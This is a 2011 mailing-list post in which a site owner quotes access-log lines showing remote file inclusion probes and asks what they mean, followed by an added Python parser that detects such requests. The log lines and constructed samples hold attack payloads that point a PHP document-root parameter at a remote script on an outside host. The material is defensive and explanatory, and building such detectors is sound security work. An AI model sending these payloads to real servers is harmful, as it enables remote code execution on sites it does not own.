[BlueOnyx:08490] Making sense of log files...

Wayne Michael wrmichael at hotmail.com
Fri Sep 16 08:11:33 PET 2011


Typically I haven't taken the time to monitor all my log files, but recently I've been paying more attention to them.

This is the log from dfix:

Warning: Blocking 210.127.253.246
www.wrmichael.com 210.127.253.246 - - [14/Sep/2011:18:50:39 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.hackorea.com/d1.txt??? HTTP/1.1" 301 - "-" "Mozilla/5.0"
www.wrmichael.com 210.127.253.246 - - [14/Sep/2011:18:50:38 -0400] "GET /?p=1693////?_SERVER[DOCUMENT_ROOT]=http://www.hackorea.com/d1.txt??? HTTP/1.1" 200 24991 "-" "Mozilla/5.0"
www.wrmichael.com 210.127.253.246 - - [14/Sep/2011:18:50:40 -0400] "GET /?_SERVERDOCUMENT_ROOT=http://www.hackorea.com/d1.txt??? HTTP/1.1" 200 21696 "-" "Mozilla/5.0"
www.wrmichael.com 210.127.253.246 - - [14/Sep/2011:18:52:05 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.hackorea.com/d1.txt??? HTTP/1.1" 301 - "-" "Mozilla/5.0"
www.wrmichael.com 210.127.253.246 - - [14/Sep/2011:18:52:06 -0400] "GET /?_SERVERDOCUMENT_ROOT=http://www.hackorea.com/d1.txt??? HTTP/1.1" 200 21696 "-" "Mozilla/5.0"
www.wrmichael.com 210.127.253.246 - - [14/Sep/2011:18:52:24 -0400] "GET /?p=1693////?_SERVER[DOCUMENT_ROOT]=http://www.hackorea.com/d1.txt??? HTTP/1.1" 200 24991 "-" "Mozilla/5.0"



Not really sure what it means other than it blocked the IP address. 

?p=1693 is a valid link on my site. Does that mean this is the page they tried to take over, and that they are coming from hackorea?

Anything to worry about?

Thanks,

Wayne
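
An added example, not part of Wayne's message and not dfix code: a small Python parser for the virtual-host-prefixed access-log format quoted above. It flags requests that pass a remote URL as a parameter value, the shape of a remote file inclusion probe, and notes when the parameter name imitates a PHP superglobal such as `_SERVER`. The function names are hypothetical and the sample lines are constructed, using documentation IP addresses and example domains.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Virtual-host-prefixed combined log format, the layout of the lines in the post.
LINE_RE = re.compile(
    r'^(?P<vhost>\S+) (?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) ')
# A parameter whose value is a remote URL. Searched over the whole target,
# because these requests carry a second "?" that a strict query parser drops.
REMOTE_RE = re.compile(r'[?&](?P<name>[^=?&]+)=(?P<url>(?:https?|ftp)://[^?&\s]+)', re.I)
# Parameter names that imitate PHP superglobals.
SUPERGLOBAL_RE = re.compile(
    r'^(?:_(?:SERVER|GET|POST|COOKIE|REQUEST|ENV|FILES|SESSION)|GLOBALS)')

def find_remote_param(line):
    """Return a finding dict for a remote-URL parameter, or None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    hit = REMOTE_RE.search(unquote(m['target']))
    if not hit:
        return None
    return {'ip': m['ip'], 'vhost': m['vhost'], 'status': int(m['status']),
            'param': hit['name'], 'remote': hit['url'],
            'superglobal': bool(SUPERGLOBAL_RE.match(hit['name']))}

def summarize(lines):
    """Group findings by client IP: hit count, statuses, parameters seen."""
    out = defaultdict(lambda: {'hits': 0, 'statuses': set(), 'params': set()})
    for f in filter(None, map(find_remote_param, lines)):
        entry = out[f['ip']]
        entry['hits'] += 1
        entry['statuses'].add(f['status'])
        entry['params'].add(f['param'])
    return dict(out)

# Constructed sample lines (documentation addresses and example domains).
SAMPLE = [
    'www.example.com 203.0.113.7 - - [14/Sep/2011:18:50:39 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://files.example.net/d1.txt??? HTTP/1.1" 301 - "-" "Mozilla/5.0"',
    'www.example.com 203.0.113.7 - - [14/Sep/2011:18:50:38 -0400] "GET /?p=1693////?_SERVER[DOCUMENT_ROOT]=http://files.example.net/d1.txt??? HTTP/1.1" 200 24991 "-" "Mozilla/5.0"',
    'www.example.com 203.0.113.7 - - [14/Sep/2011:18:50:40 -0400] "GET /?_SERVERDOCUMENT_ROOT=http://files.example.net/d1.txt??? HTTP/1.1" 200 21696 "-" "Mozilla/5.0"',
    'www.example.com 198.51.100.4 - - [14/Sep/2011:18:51:02 -0400] "GET /?p=1693 HTTP/1.1" 200 24991 "-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for ip, info in summarize(SAMPLE).items():
        print(ip, info['hits'], sorted(info['statuses']), sorted(info['params']))
```

A 200 status on a flagged line only shows that the server returned a page for that request; it does not by itself show that the remote file was fetched or executed.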


 		 	   		  